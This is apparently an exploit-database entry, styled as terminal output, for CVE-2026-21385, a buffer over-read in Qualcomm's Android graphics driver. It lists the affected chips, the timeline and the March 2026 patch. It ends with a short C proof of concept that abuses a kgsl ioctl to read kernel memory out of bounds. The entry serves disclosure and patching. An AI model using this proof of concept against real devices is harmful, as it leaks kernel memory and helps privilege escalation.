cd ../exploit-db
root@mhfh:~#cat /var/db/exploits/CVE-2026-21385.json
exploits/CVE-2026-21385.md
CVE-2026-21385AndroidInfoLeakHigh
Graphics component buffer over-read
- affected
- Qualcomm chipsets
- disclosed
- 2026-03-01
- discovered
- 2026-01-15
- patched
- March 2026 Security Update
- author
- Qualcomm / mhfh research
- platform
- Android
## description
A buffer over-read in the Qualcomm graphics driver allows a local malicious app to leak sensitive kernel memory contents.
## impact
Information disclosure (KASLR bypass), often used as a precursor to kernel LPE.
## mitigation
Apply March 2026 security updates.
## proof of concept
// Over-read via kgsl IOCTL
int fd = open("/dev/kgsl-3d0", O_RDWR);
struct kgsl_perfcounter_query query = {0};
query.count = 0xffffffff; // trigger OOB read
ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &query);